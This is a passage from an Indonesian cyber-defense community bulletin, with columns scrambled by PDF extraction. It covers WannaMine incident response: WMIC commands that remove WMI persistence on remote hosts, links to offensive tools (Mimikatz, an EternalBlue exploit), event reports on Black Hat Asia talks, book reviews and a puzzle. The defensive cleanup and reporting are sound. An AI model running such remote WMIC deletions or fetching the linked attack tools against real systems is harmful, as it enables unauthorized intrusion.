wmic /node:$ip /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE
"Filter=""__EventFilter.Name='DSM Event Log Filter'""" DELETE
wmic /node:$ip /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE
"Filter=""__EventFilter.Name='DSM Event Logs Filter'""" DELETE
} else {Write-Host "Computer $ip RPC error" -ForegroundColor DarkRed;}

}
Skrip di atas dirancang untuk penggunaan pada komputer-komputer yang tergabung da-
lam Active Directory dimana eksekusi dilakukan menggunakan user domain yang memiliki
akses ke komputer-komputer yang terinfeksi. Untuk eksekusi menggunakan administrator
lokal, maka username dan password harus didefinisikan setelah perintah WMIC. Contoh:
WMIC /USER:useradmin /PASSWORD:passwordadmin /NODE:ip /NAMESPACE:”\\root\default” PATH

Win32_Services DELETE
Hal-hal yang perlu diperhatikan selama proses penanganan adalah sebagain berikut:
๏ Gunakan akun khusus untuk melakukan remote desktop ke komputer yang terinfeksi.
Jangan menggunakan Domain Administrator atau akun administrator lain yang memiliki
akses ke komputer lain yang bersih.

๏ Penanganan harus dimulai dari komputer yang paling kritikal terlebih dahulu, kemudian
secara bertahap dilakukan pembersihan ke komputer lainnya.
Berikut ini adalah langkah-langkah yang bisa dilakukan untuk meredam penyebaran dan
menghapus persistensi WannaMine.
1. Lakukan pembatasan akses internet melalui firewall, blokir port-port yang tidak diperlu-
kan terutama port yang digunakan oleh WannaMine yaitu 8000 dan 14444. Perlu diper-
hatikan bahwa port ini bisa berbeda sesuai varian.
2. Nonaktifkan koneksi jaringan komputer-komputer yang terinfeksi jika memungkinkan.
3. Bersihkan malware dari komputer yang terinfeksi menggunakan skrip di atas.
4. Ganti password seluruh user pada komputer yang terinfeksi, dimulai dengan user yang
memiliki hak akses tertinggi. Misalnya jika Domain Administrator pernah melakukan
login ke server yang terinfeksi, maka password domain administrator yang harus di-
ganti pertama kali, dilanjutkan dengan user lainnya.
Pastikan komputer sudah bersih sebelum digunakan kembali untuk operasional.
Kesimpulan
Saat ini semakin banyak malware yang memanfaatkan software resmi Microsoft untuk
mengeksekusi payload dan melakukan penyebaran. Hal ini membuat pencegahan semakin
sulit dan pada suatu saat tidak bisa dicegah lagi. Kemampuan untuk mendeteksi dan
merespon dengan cepat adalah bagian yang penting dalam program keamanan informasi.
Sebagian besar insiden keamanan informasi dapat dicegah melalui penerapan praktek-
praktek standar yang sering diabaikan, misalnya Patch Management dan Least Privilege.
Patch Management yang baik akan menghindarkan anda dari insiden akibat
known exploit, sedangkan praktek Least Privilege misalnya penerapan Egress Filtering
pada Firewall dan pembatasan penggunaan administrator untuk aktivitas harian akan mem-
bantu memperkecil dampak insiden.

Referensi 11. http://www.exploit-monday.com/2016/
08/wmi-persistence-using-wmic.html
Referensi pada Github yang digunakan mal-
12. https://www.fireeye.com/content/dam/
ware, dan skrip untuk cleaning fireeye-www/global/en/current-threats/
pdfs/wp-windows-management-instru
1. https://github.com/Kevin-Robertson/In mentation.pdf
voke-TheHash/blob/master/Invoke-W
MIExec.ps1 13. https://www.blackhat.com/docs/us-15
/materials/us-15-Graeber-Abusing-Win
2. https://github.com/clymb3r/PowerShel dows-Management-Instrumentation-W
l/blob/master/Invoke-Mimikatz/Invoke- MI-To-Build-A-Persistent%20Asynchro
Mimikatz.ps1 nous-And-Fileless-Backdoor-wp.pdf
3. https://github.com/EmpireProject/Emp 14. http://poppopret.blogspot.com/2011/0
ire/blob/master/data/module_source/e 9/playing-with-mof-files-on-windows-f
xploitation/Exploit-EternalBlue.ps1 or.html
4. https://github.com/vletoux/ms17-010- 15. https://docs.microsoft.com/en-us/dotn
Scanner et/csharp/language-reference/compiler
-options/command-line-building-with-
5. https://github.com/xmrig/xmrig
csc-exe
6. https://github.com/danielbohannon/Inv
Analisis lainnya tentang WannaMine
oke-Obfuscation
16. http://securityaffairs.co/wordpress/634
7. https://github.com/c0mmand3rOpSec/
88/malware/advanced-memory-crypto
CVE-2017-10271
worm.html
8. https://github.com/christofersimbar/W
17. https://www.fireeye.com/blog/threat-re
annaMineCleaner
search/2018/02/cve-2017-10271-used
Referensi mengenai teknik yang digunakan -to-deliver-cryptominers.html
9. https://www.sans.org/summit-archives 18. https://www.crowdstrike.com/blog/cry

/file/summit-archive-1492186586.pdf ptomining-harmless-nuisance-disrupti
ve-threat/
10. http://la.trendmicro.com/media/misc/u
nderstanding-wmi-malware-research-p
aper-en.pdf

Laporan serangan WannaMine dan
WannaCry
19. https://social.technet.microsoft.com/F
orums/en-US/de86f13b-74f0-424c-81
69-62750d3fe7c4/powershell-high-cpu
-end-task-every-90-minutes?forum=wi
nserverpowershell
20. https://forum.eset.com/topic/14143-p
owershell-script-100-cpu-load-malicio
us-attack/
21. https://community.spiceworks.com/to
pic/2111360-powershell-virus
22. https://social.technet.microsoft.com/F
orums/windows/en-US/ce6b5111-42f5
-4d59-9d9c-ed9617521c7b/server-infe
cted-with-wanna-mine-malware?forum
=winserversecurity
23. http://www.straitstimes.com/world/org
anisations-hit-by-global-cyberattack
CHRISTOFER SIMBAR
CISSP, CEH, Fortinet NSE 4
Network Security Professional,
Google Certified Associate An-
droid Developer
 
Information Security Analyst di
BPJS Kesehatan

5 “There are only two types of
companies: those that have
been hacked, and those that
Events Report will be”
– Robert Mueller, FBI Director, 2012
sumber :
https://www.simplilearn.com/ice9/free_resources_article_thumb/cyber-secu
rity-interview-questions-and-answers-article.jpg
3rd Meetup - Cyber Defense Community di
Grha Datacomm
Pada meetup kali ini (meetup ke-3), kini gili- kaki sendiri). Namun sejauh apa kemandir-
ran PT. Datacomm yang menjadi lokasi ke- ian itu diwujudkan hal ini yang perlu didefin-
giatan dari Komunitas CDEF untuk berkum- isikan lebih rinci. Tidak hanya itu pada sesi
pul, bertukar pikiran dan berbagi informasi ini juga dibahas 2 topik menarik lainnya,
maupun pengalaman seputar topik “cyber yakni SOC Functional Area dan Synchronis-
defense”. Dalam kesempatan ini komuni- ing Information Security Actors.
tas mencoba mengangkat tema mengenai
“Membangun Kemandirian Teknologi da- Kegiatan ini sengaja dilakukan di tanggal
lam IT Security”, sebuah topik yang cukup 14 Februari 2018, selain untuk memeriah-
menarik mengingat di era pemerintahan kan hari Kasih Sayang, tetapi juga sebagai
saat ini hal ini coba digelorakan kembali hari peluncuran perdana Bulletin CDEF
dengan konsep “berdikari” (berdiri di atas sebgai salah satu bentuk konkrit komuni-

tas CDEF guna membangun dan mencer- SESI MATERI PRESENTASI
daskan kehidupan bangsa khususnya di-
bidang cyber defense. SOC Functional Area – Wahyu Nuryanto
(PT. Datacomm Diangraha)
Pada kali ini acara dibuka oleh General
Manajer Cybersecurity & Digital Transforma- Materi ini dibawakan langsung oleh Wahyu
tion PT. Datacomm Diangraha yakni Bapak Nuryanto selaku tuan rumah, dengan men-
Betha Aris Susanto, dalam sambutannya gangkat topik mengenai SOC (Security Op-
beliau sangat mendukung terselenggara- eration Center) Functional Area. Materi ini
nya acara ini dan sebagai salah satu ben- merupakan sesi berbagi pengalaman yang
tuk untuk membangun kesatuan dalam diperoleh oleh Wahyu Nuryanto setelah
mengikuti training
SANS. SOC sen-
diri secara harfiah
memiliki fungsi un-
tuk melakukan pe-
lindungan keraha-
siaan, integritas
dan ketersediaan
dari sistem infor-
masi pada sebuah
organisasi melalui
p ro a k t i f d e s a i n
dan konfigurasi,
Gambar Betha Aris Susanto - monitoring secara
General Manajer Cybersecurity & berkelanjutan dari
Digital Transformation
PT. Datacomm Diangraha
sebuah sistem,
mendeteksi aksi
membangun keamanan siber di negeri ini yang tidak diinginkan atau kondisi yang ti-
meski peserta kegiatan berasal dari back- dak diharapkan terjadi dengan tujuan un-
ground yang berbeda-beda. tuk meminimalisir kerusakan dari dampak
yang ditimbulkan.

Secara konseptual terdapat 6(enam) area Beberapa permasalahan yang diungkap-
fungsional yang dijalankan di dalam se- kan mengenai kendala dalam terwujudnya
buah SOC, yaitu sinkronisasi dari ketiga elemen tersebut
yakni
๏ Pusat Kendali (Command Center)
๏ Monitoring Keamanan Jaringan (Net- 1. Pemerintah selaku regulator yang
work Security Monitoring) kurang adaptif terhadap perubahan,
serta program pembangunan kompe-
๏ Threat Intelligence
tensi maupun arah pembangunan kea-
๏ Tanggap Insiden (Incident Response) manan siber yang tidak berjalan efektif
๏ Forensic sehingga cenderung hilang arah
๏ Self Assessment 2. Dominasi dari “Red Team” atau “Offen-
sive Team” sehingga stigma yang
terbentuk cenderung menimbulkan ke-
Synchronising Information Security Ac- san bahwa keamanan siber hanyalah
tors - Firzha Ramahdan (Defenxor) ranah offensive team saja, namun un-
sur defensif tidak begitu mendapat per-
Pada materi kali ini, pemapar yang meru-
hatian.
pakan co-founder komunitas CDEF men-
gangkat topik mengenai bagaimana per- 3. Pelaku industri bergerak berdasarkan
masalahan di lapangan dan cara memban- permintaan pasar untuk bertahan di da-
gun siknronisasi aktor keamanan informasi lam persaingan usaha.
yang ada di Indonesia. Seperti diketahui 4. Kekurang pahaman atau belum sa-
bahwa aktor di dalam dunia keamanan in- darnya pengguna mengenai dampak
formasi melibatkan “Triple Helix” yang ti- yang ditimbulkan dari security breach
dak bisa saling terlepas satu sama lain, Setidaknya ketiga hal tersebut menimbul-
yakni Pemerintah selaku regulator, Vendor kan dampak yang cukup signifikan bagi
selaku penyedia jasa dan produk teknologi dunia keamanan siber, yakni menjadi bi-
maupun obyek regulasi dan Pengguna se- asnya penerapan keamanan informasi dan
laku pemanfaat layanan dan obyek regu- eksekusinya akibat dari regulator tidak
lasi. memiliki arah yang jelas terhadap penca-
paian tujuan, tidak adanya panduan bagi
pengguna maupun industri dalam mengem-

bangkan teknologi dan cenderung terben- Rusdi Rachim. “Kemandiran harus
tuknya self regulation organization, kera- mulai kita bangun dari hal yang terke-
guan akan manfaat dari penerapan kea- cil sekalipun.”
manan informasi dan tidak adanya kontrol
dari regulasi membuat nilai komersial dari Menurut pria yang hangat disapa om
profesi keamanan siber cenderung Rusdi yang juga merupakan Vice President
menurun. ISC2 Indonesia, kemandirian adalah ke-
mampuan kita dalam melakukan segala se-
Hal inilah yang menjadi keprihatinan dari suatunya secara mandiri tanpa bergantung
Firzha Ramadhan atau yang kerap disapa dengan orang lain. Salah satu hal yang be-
Mas Temon untuk membangun kolaborasi liau terapkan adalah melakukan pembangu-
dan sinkronisasi yang efektif diantara nan software dimana tempat dia bekerja
ketiga elemen tersebut, sehingga penera- secara mandiri melalui internal tim yang di-
pan keamanan informasi menjadi hal yang miliki, hingga ke pengujian keamanan yang
prioritas dan memiliki arah yang jelas, kam- dilakukan. Melalui tahapan ini sesung-
panye kesadaran dan budaya keamanan guhnya kita telah mendorong tumbuhnya
informasi digalakkan sehingga pengguna kemandirian dalam lingkungan yang terke-
lebih memahami pentingnya keamanan in- cil. Apabila seluruh pelaku industri, pegiat
formasi dan akhirnya profesi keamanan in- keamanan siber di Indonesia memiliki
formasi akan mendapatkan tempat yang pemikiran yang sama, maka kita akan
layak seperti halnya di negara maju. memiliki efek multiplier yang besar untuk
menumbuhkan semangat kemandirian itu
SESI DISKUSI PANEL sendiri.
Pada pertemuan kali ini sesi materi ditutup

Paulus Tamba. “Sinergi dunia kam-
dengan acara diskusi panel dengan
pus dengan dunia profesional harus
menghadirkan pegiat, praktisi dan konsul-
diwujudkan untuk membangun ke-
tan keamanan siber yang sudah sangat
mandirian.”
berpengalaman dengan dunia keamanan
siber di Indonesia. Kali ini diskusi panel Berbicara kemandirian dalam lingkup yang
mengangkat tema mengenai “Kemandirian luas (nasional), apabila kita dihadapkan
Teknologi Informasi dalam IT Security”, pada tantangan apakah kita mampu mem-
berikut ringkasan dari diskusi tersebut buat produk teknologi keamanan siber den-

gan skala enterprise, maka jawabannya ian itu belum terwujud hingga saat ini,
adalah kita mampu-mampu saja. Namun yakni Pemerintah, Iklim Industri dan Sum-
pertanyaan yang harus kita tanyakan keber Daya Manusia. Dari kesemua faktor ini,
pada diri sendiri adalah butuh berapa lama Pemerintah memiliki peran yang sangat
ini diwujudkan yang menjadi problem dominan dalam menyebabkan mengapa
utama. Selain itu menurut om Paulus, kita terlambat atau belum dapat mencapai
bahwa hampir sebagian besar pegiat kea- kemandirian yang diharapkan. Hal ini bisa
manan siber di Indonesia bergelut pada ta- kita lihat sejauh mana kontribusi pemerin-
taran operasional teknologi, namun belum tah memberikan iklim yang kondusif bagi
menyentuh domain riset teknologi kea- pelaku industri lokal untuk mengembang-
manan siber, hal ini yang mengafirmasi kan teknologinya, di beberapa negara
bahwa kita masih memerlukan proses dan maju pemerintah mendorong tumbuhnya
waktu yang panjang untuk mencapai ke- industri lokal untuk berkembang dengan
mandirian teknologi keamanan siber. Hal berbagai macam insentif riset maupun
lain yang tidak kalah penting adalah penggunaan produk industri lokal di be-
adanya jurang pemisah yang sangat tegas berapa area pemerintahan sehingga indus-
antara kampus dan dunia praktisi, tri lokal mendapatkan ruang untuk terus
umumnya bangku kuliah hanya berbicara berkembang. Senada eperti yang dika-
teori di dalam buku tapi tidak melihat ken- takan oleh om Paulus Tamba, beliau juga
yataan yang terjadi di lapangan, sehingga melihat bahwa kapabilitas sumber daya
hal ini juga menjadi salah satu faktor diper- manusia khususnya dalam hal riset
lukan adanya sinergi antara dunia kampus teknologi siber memang harus ditingkat-
dan dunia praktisi. Tentu harapannya pe- kan, kecenderungan yang tumbuh di kam-
merintah bisa melihat permasalahan ini un- pus saat ini adalah kampus hanya
tuk menjadi benang merah penghubung memikirkan bahwa lulusan mereka dapat
antara dunia kampus dan dunia praktisi. digunakan di dunia kerja, sehingga apa
yang diajarkan di kampus adalah hal yang
TinTin. “Pemerintah harus mengambil sifatnya praktikal dan tidak mengede-
peran sentral guna mewujudkan ke- pankan konsep fundamental keamanan si-
mandirian teknologi keamanan siber.” ber itu sendiri. Selain itu standard pengga-
jian pelaku, praktisi maupun profesional
Menurut pria yang hangat disapa TinTin,
keamanan siber di Indonesia masih jauh
ada beberapa faktor mengapa kemandir-
dengan standard yang ada pada

umumnya, jadi kita jangan heran kalo sum- dicerna oleh eksekutif maupun top level
ber daya manusia kita yang berkualitas le- management. Sehingga pada titik tertentu
bih memilih untuk bekerja di luar negeri. menjadi penting bahwa orang teknikal
seperti rekan-rekan yang ada di dalam
Frans. “Kunci kegagalan kita memban- komunitas ini pada akhirnya harus men-
gun kemandirian adalah kegagalan coba menerobos area manajerial, bayang-
kita mengkomunikasikan mengenai kan jikalau pemangku kepentingan tidak
pentingnya kemandirian teknologi ke- memahami esensi dari keamanan siber itu
pada Eksekutif maupun Top Level sendiri, jangankan kemandirian teknologi
Management di negara ini” keamanan siber, penghasilan dan kondisi
yang kita alami sekarang ini tentu masih
Menurut om Frans, Bussiness Director di akan tetap sama kedepannya, tutup om
RSA Indonesia, beliau sepakat untuk Frans dengan senyuman.
mewujudkan kemandirian yang seutuhnya
di Indonesia, namun menurut beliau hal Dalam sesi tanya jawab terdapat dua hal
yang merupakan salah satu kunci kega- penting yang dikemukakan oleh audiens
galan kita dalam mewujudkan kemandirian yang berinteraksi
teknologi keamanan siber adalah profe-
sional keamanan siber di Indonesia hanya 1. Diharapkan komunitas ini juga dapat
berhenti pada domain teknikal, karena membantu merumuskan pentahapan
pada dasarnya untuk mewujudkan ke- pembangunan kemandirian teknologi
mandirian hal yang pertama harus kita ban- kemanan siber di Indonesia, sehingga
gun adalah bagaimana kita bisa meyak- komunitas juga dapat memberikan
inkan para top level management di negeri masukan kepada pihak terkait menge-
ini mengenai pentingnya kemandirian nai kemandirian apa yang harus diwu-
teknologi keamanan siber itu sendiri. Se- judkan, pentahapannya dan kebutuhan
hingga menurut pria yang murah senyum yang diperlukan untuk mewujudkan hal
dan hangat disapa Om Frans, menjadi hal tersebut.
yang sangat penting bagi kita semua se-
2. Kita selaku pegiat keamanan siber,
laku profesional keamanan siber untuk mu-
tentu harus mulai belajar mengkomuni-
lai memahami pentingnya mengkomunika-
kasikan dengan efektif mengenai mak-
sikan hal yang kita maksud menggunakan
sud dan tujuan keamanan siber perlu
bahasa yang lebih mudah diterima dan

dibangun, dengan bahasa yang lebih dah dipahami karena hadir dalam bahasa
mudah dipahami sehingga esensi yang Indonesia. Peluncuran perdana bulletin ini
kita harapkan dapat tersampaikan den- di tanggal 14 Februari 2018 merupakan wu-
gan baik ke pemangku kepentingan. jud kasih sayang komunitas untuk menum-
buhkan Cyber Defense di Indonesia.
Kemudian Adi Nugroho, selaku moderator
menutup sesi diskusi kali ini dengan kesim-
pulan banyak hal yang masih menjadi
pekerjaan rumah yang harus diselesaikan,
semoga sinergi semua pihak dapat mewu-
judkan kemandirian yang kita harapkan.
Moderator pun men challenge para panelis
untuk menjadi leader project di komunitas
CDEF sehingga ruh kemandirian bisa di-
hembuskan secara perlahan kepada ang-
gota komunitas ini.
LAUNCHING BULLETIN CDEF

Meetup kali ini akhirnya ditutup dengan pe-
luncuran Bulletin CDEF oleh salah satu
founder komunitas ini, yakni Mas Digit Ok-
tavianto. Mas Digit menyampaikan bahwa
bulletin ini adalah salah satu wujud nyata
komitemen dan kontribusi komunitas
CDEF untuk berbagi pengetahuan dan pen-
galaman di bidang keamanan siber,
khususnya Cyber Defense area. Diharap-
kan melalui bulletin ini seluruh pegiat kea-
manan siber Indonesia dari sabang sampai
merauke dapat mudah mendapatkan ak-
ses terhadap perkembangan informasi di
dunia kemanan siber yang tentunya mu-

DATAFOCUS 2018 INDONESIA
https://www.insig2.eu/data-focus2018-f22 mah tepatnya di kota Jakarta dan Sura-

baya.
DataFocus merupakan sebuah konferensi
yang di inisiasi oleh INSIG2 sejak tahun Konferensi ini dibagi menjadi 3 track yaitu
2012. Konferensi ini berfokus pada topik Legal Track, Investigator Track, dan Techni-
mengenai investigasi barang bukti digital cal Track. Pada Legal Track dikhususkan
(digital evidence investigation), digital foren- bagi penegak hukum serta kuasa hukum
sic, dan topik lainnya yang berkaitan den- yang biasa menangani kasus yang berkai-
gan isu mengenai keamanan siber. Pada tan dengan barang bukti digital (digital evi-
kesempatan di tahun 2018 ini DataFocus dence) pada pengadilan. Kemudian Investi-
Indonesia berkesempatan menjadi tuan ru- gator Track ditujukan kepada aparat pene-
gak hukum seperti kepolisian, kejaksaan,

dan APH (Aparat Penegak Hukum) lainnya has “Preparing Human Resouce for Digital
yang berhubungan dengan kasus Digital Forensic”, dalam paparannya ia menyam-
Forensic setiap harinya. Sementara pada paikan mengenai pentingnya pendidikan di
Technical track lebih ditujukan pada prak- tingkatan universitas untuk membentuk ju-
tisi incident responder dan digital forensic rusan yang spesifik untuk mempersiapkan
investigator yang memang lebih ke ranah sumber daya manusia di bidang digital fo-
teknis dan perkembangan teknologi di rensic. Seperti kita ketahui bersama saat
bidang digital forensic. ini beberapa universitas di Indonesia yang
sudah mulai membuka program jurusan
Mengenai agenda lebih rinci untuk kon- spesifik di bidang keamanan siber. Selain
ferensi ini di setiap track dapat anda lihat itu ada juga universitas yang membuka
pada halaman berikut ini : bidang minat Digital Forensik pada tingka-
tan program magister. Tentunya hal ini
https://www.insig2.eu/program-f22-61
perlu diapreasiasi dan sangat membangga-
Bapak Muhammad Nuh Al Azhar dari Pu- kan mengingat permintaan terhadap sum-
sat Laboratorium Forensik Digital Mabes ber daya manusia di bidang keamanan si-
POLRI dan juga sekaligus ketua AFDI (Aso- ber saat ini cukup besar.
siasi Forensik Digital Indonesia) memberi-
# Reportase Kegiatan : Digit Oktavianto
kan gambaran mengenai peta keamanan
siber yang dapat dikembangkan
khususnya di Indonesia. Dalam pemapar-
annya, ia juga memberikan gambaran men-
genai perkembangan digital forensic di In-
donesia. Materi paparan yang disampai-
kan oleh Bapak M. Nuh Al Azhar anda da-
pat mendownloadnya pada link berikut :
https://kitsia.id/attachment/download/?id=
48
Presentasi lainnya yang juga cukup

menarik adalah dari Prof. I Made Wiryana
dari Universitas Gunadarma yang memba-

BLACKHAT ASIA 2018 - SINGAPORE
Resource Material Breach Detection at A Scale

https://www.blackhat.com/asia-18/briefing
s.html https://www.blackhat.com/docs/asia-18/a
sia-18-bourke-grzelak-breach-detection-at
Untuk review event pada BlackHat Brief- -scale-with-aws-honey-tokens.pdf
ing 2018, saya akan mencoba mengulas
Pada presentasi kali ini di bawakan oleh
beberapa presentasi yang berkaitan den-
tim security dari Atlassian. Mereka memba-
gan cyber defense.
wakan topik mengenai HoneyToken. Hon-
eyToken adalah istilah yang digunakan un-
tuk memancing attacker. Terminologi hon-
eypot atau honeynet tentunya tidak asing
bagi pembaca sekalian dimana

terminologi tersebut digunakan untuk me- Mac A Mal : An Automated Framework
mancing atau berkamuflase dari para for Mac Malware Hunting
threat actors. Sebagaimana namanya, Hon-
eyToken merupakan istilah dimana para Tautan materi presentasi :
pemilik infrastruktur membuat sebuah to-
https://www.blackhat.com/docs/asia-18/a
ken (token ini bsia berupa apa saja, seperti
sia-18-Phuc-Mac-A-Mal-An%20Automate
username, email, key, file, document,dan
d%20Framework%20for%20Mac%20Mal
lain-lain) dimana jika token yang dibuat
ware%20Hunting.pdf
oleh pemilik infrastruktur itu di akses atau
dieksekusi, maka akan ada peringatan dan https://www.blackhat.com/docs/asia-18/a
notifikasi yang dikirim kepada pemilik infra- sia-18-Phuc-Mac-A-Mal-An%20Automate
struktur. Tujuannya adalah dimana file ka- d%20Framework%20for%20Mac%20Mal
muflase tersebut sengaja disebarkan, un- ware%20Hunting-wp.pdf
tuk melihat siapa bad guys yang mencoba
mengakses atau mengeksekusi token ter- Pada sesi kali ini pembicara membahas-
sebut dan apa yang dilakukan setelah mengenai tools yang mereka kembangkan
mereka mendapatkan token tersebut. Hal yaitu MacAMal. MacAMal merupakan se-
ini digunakan untuk mencari tahu perilaku buah platform malware analysis yang fokus
atau aktivitas dari threat actor untuk kemu- untuk menganalisa malware pada sistem
dian dipelajari. operasi Macintosh. Tools dapat digunakan
untuk melakukan proses static maupun dy-
Pada presentasi kali ini, para pembicara namic analysis. Tools ini juga dikembang-
membuat sebuah token berupa AWS Key. kan untuk mengatasi adanya sandbox by-
Untuk membantu membangkitkan token pass dari beberapa malware yang mulai
tersebut, para penulis menggunakan lay- aware mengenai sandbox. Mereka men-
a n a n d a r i C a r a y To k e n gembangkan beberapa anti evasion tech-
https://canarytokens.org/generate. Mereka nique yang bertujuan untuk mengatasi mal-
juga dibantu dengan tools bernama Space- ware yang aware terhadap environment
crab, dimana Spacecrab ini akan memoni- sandbox. Beberapa studi kasus yang dila-
toring threat actors yang telah mendapat- kukan untuk melakukan pengujian salah sa-
kan HoneyToken AWS key tadi, dan meli- tunya adalah APT32 – OceanLotus, APT
hat aktivitas apa saja yang dilakukan threat Campaign yang menargetkan infrastruktur
actor di server AWS milik pembicara. Vietnam dan China.

Invoke-DOSfuscation: Techniques FOR satu istilah yang mulai sering terdengar
%F IN (-style) DO (S-level CMD Obfusca- adalah mengenai streaming / streamline
tion) prevention. Hal ini pertama kali didengung-
kan oleh Carbon Black ketika membahas
Tautan materi presentasi mengenai Endpoint Protection dimana
threat yang muncul tidak hanya berupa ser-
https://www.blackhat.com/docs/asia-18/a
angan malware, namun juga banyak seran-
sia-18-bohannon-invoke_dosfuscation_tec
gan yang berupa non-malware. Non mal-
hniques_for_fin_style_dos_level_cmd_obfu
ware attack ini yang beberapa tahun tera-
scation-wp.pdf
khir mulai banyak terjadi dimana ketika se-
curity perimeter pada sisi endpoint sudah

https://www.blackhat.com/docs/asia-18/a cukup lengkap, namun serangan yang ber-
sia-18-bohannon-invoke_dosfuscation_tec sifat non-malware ini yang bisa berupa
hniques_for_fin_style_dos_level_cmd_obfu powershell attack, script-based attack
scation.pdf yang mulai digunakan oleh threat actor un-
tuk mengelabui deteksi dan melewati secu-
Paper serta presentasi sesi ini sangat rity protection. Pada presentasi kali ini Dan-
menarik yang membahas mengenai power- iel Bohannon mencoba menjelaskan bah-
shell obfuscation yang biasanya digunakan wasanya perintah cmd.exe yang legitimate
untuk mengelabui deteksi oleh Blue Team. dan hal yang umum untuk di ekseskui na-
Seperti kita ketahui bahwasanya salah mun nyatanya bisa menjadi entry point se-

buah serangan, karena attacker melakukan Selain itu Daniel juga membahas banyak
obfuscation dan kamuflase di belakang teknik lainnya yang biasa digunakan threat
cmd.exe ini. actor atau juga digunakan oleh Red Team
untuk melakukan obfuscation dan mele-
Pada metode selanjutnya, ia juga memba- wati security perimeter. Slide dan Paper
has bahwasanya threat actor biasanya dari Daniel Bohannon ini wajib menjadi ru-
menggunakan obfuscation pada binary file jukan bagi semua Blue team untuk mempe-
untuk mencegah adanya deteksi dari IOC lajari TTP dari para threat actor.
(Indicator of Compromise) yang dimiliki
oleh Blue Team. Namun ada teknik lainnya # Reportase Kegiatan : Digit Oktavianto
yaitu dengan menggunakan Character In-
sertion Obfuscation technique untuk
mengelabui deteksi melalui penggunaan
escape character oleh threat actor.

“People always make the
best exploits. I’ve never
6
found it hard to hack most
people. If you listen to
them, watch them, their vul-
nerabilities are like a neon
Ulasan Buku sign screwed into their
heads”
– Elliot Alderson, Mr. Robot
Judul Buku : Network Forensics – Panduan Analisis dan
Investigasi Paket Data Jaringan
Menggunakan Wireshark
Penulis : Agus Kurniawan
Penerbit : ANDI Yogyakarta
Tahun Terbit : 2012
Rating : 4.2 dari 5 Bintang
Ulasan
Buku ini membahas spesifik mengenai aktivitas network
forensic yang biasa dilakukan forensic investigator ketika mela-
kukan analisa terhadap evidence dari packet capture di dalam
“Buku ini sangat
jaringan. Aktivitas network forensic dalam buku ini sendiri spe-
cocok untuk
sifik membahas penggunaan tools Wireshark yang meru-
pembaca dengan
pakan aplikasi umum yang digunakan untuk menganalisa
tingkatan pemula
paket data. Buku ini membahas dari hal dasar, serta pengeta-
yang ingin belajar
huan dasar fundamental penggunaan Wireshark. Jika anda
mengenai packet
belum familiar menggunakan tools Wireshark, anda tidak
analysis.”
perlu khawatir karena penulis memberikan langkah demi lang-
kah mengenai penggunaan Wireshark dalam buku ini.
Buku ini mengulas dari hal yang paling fundamental seperti

protocol TCP/IP, TCP Flags, DNS, ARP, dan lainnya. Penulis
juga memberikan contoh file pcap untuk kemudian dibahas
dan dianalisa untuk menemukan sumber permasalahan yang
ada pada studi kasus tersebut. Pada bagian akhir penulis
memberikan studi kasus mengenai aktifitas network forensic
serta memberikan beberapa studi kasus yang menarik untuk
diulas.
Secara keseluruhan buku ini cukup baik, apabila jika ditujukan

untuk pemula yang mencoba belajar mengenai packet
118
analysis serta mempelajari network forensic. Hanya saja studi
kasus yang diberikan untuk network forensic tidak terlalu
banyak dan hampir sebagian besar kontennya (sekitar 60-
70%) lebih banyak membahas packet analysis ketimbang net-
work forensic. Menurut saya buku ini cukup layak anda miliki
untuk di jadikan sumber referensi belajar packet analysis.
# Diulas oleh Digit Oktavianto #
Judul Buku : Effective Threat Intelligence – Building and

Running an Intel for Your Organization
Penulis : James Dietle
Penerbit : Create Space Independent Publisher
Tahun Terbit : 2016
Rating : 4.7 dari 5 Bintang
Ulasan
Buku ini membahas detail mengenai Threat Intelligence dan

bagaimana pentingnya peranan Threat Intelligence dalam se-
buah organisasi. Pada buku ini James menulis dari hal paling
“Secara keseluruhan fundamental mengenai Threat Intelligence, serta menulis ba-
buku ini sangat gaimana memulai membangun Threat Intelligence serta bagai-
bagus untuk dimiliki, mana mendapatkan sumber threat intel itu sendiri. Pada awal
terutama bagi bahasan di Bagian pertama bukunya, James memberikan se-
organisasi yang dikit gambaran mengenai Threat Intelligence, seperti hal yang
sudah mengarah perlu diobservasi untuk menemukan sebuah anomali seperti
kepada threat malware behavior, network traffic logs, IOC (Indicator of Com-
hunting program” promise), dan strange host behavior. Dalam bukunya James
juga menyinggung mengenai OSINT (Open Source Intelli-
gence) karena hal tersebut juga berkaitan erat dengan Threat
Intelligence. Selain itu di bagian awal James memberikan infor-
119
masi ada beberapa cara untuk mendapatkan sumber data
feed untuk Threat Intelligence, yaitu : Open Source Feeds,
RSS Feeds, Proprietary Feeds, Social Media, Researcher Site,
Deep Web, Youtube, dan berbagai sumber lainnya.
Pada bagian selanjutnya James menuliskan mengenai TTP

dan Pyramid of Pain (Pada Bulletin edisi Q3 saya akan spesifik
membahas detail mengenai ini), serta hubungannya dengan
Threat Intelligence. James juga membahas mengenai threat
actor / adversary dan juga motifnya dalam melakukan cyber
security threat. James membeberkan strategi implementasi
Threat Intelligence yang efektif bagi suatu perusahaan.
Pada bagian ketiga james lebih spesifik membahas bagai-

mana proses dalam membangun threat intelligence program.
Teknologi yang tepat yang seperti apa yang perlu digunakan,
serta bagaimana membentuk sebuah tim yang fokus sebagai
cyber threat intelligence analyst. Pada bagian akhir dari bu-
kunya James memberikan beberapa skenario latihan berupa
studi kasus yang harus dipecahkan oleh Threat Intelligence
Team dalam sebuah organisasi, serta mengukur seberapa ma-
ture threat intelligence program yang dimiliki oleh organisasi
tersebut.
Secara keseluruhan menurut saya buku ini sangat bagus un-

tuk dimiliki, terutama bagi organisasi yang sudah mengarah ke-
pada threat hunting program, dimana threat intelligence meru-
pakan satu komponen penting yang wajib ada di dalam threat
hunting program tersebut. Buku ini sangat layak dibaca dari
level managerial (BOD / Management Level), sampai kepada
orang-orang teknis yang berada di belakang layar.
# Diulas oleh Digit Oktavianto #
120
7 “If you think technology can
solve your security
problems, then you don’t
understand the problems
CHALLENGE and you don’t understand

the technology”
– Bruce Schneier
# TEKA-TEKI SECURITY
Pertanyaan Mendatar
4. Salah satu jenis malware yang mengincar sistem SCADA yang juga dibahas pada bulle-
tin pertama CDEF
7. Nama programmer pertama di dunia yang juga merupakan seorang wanita
8. Komunitas keamanan siber khusus untuk wanita
9. Salah satu jenis NIDS
10. Nama asli pemilik akun twitter @malwareunicorn
12. Sebuah proses yang dapat dipakai untuk meng-identifikasi perilaku peretas

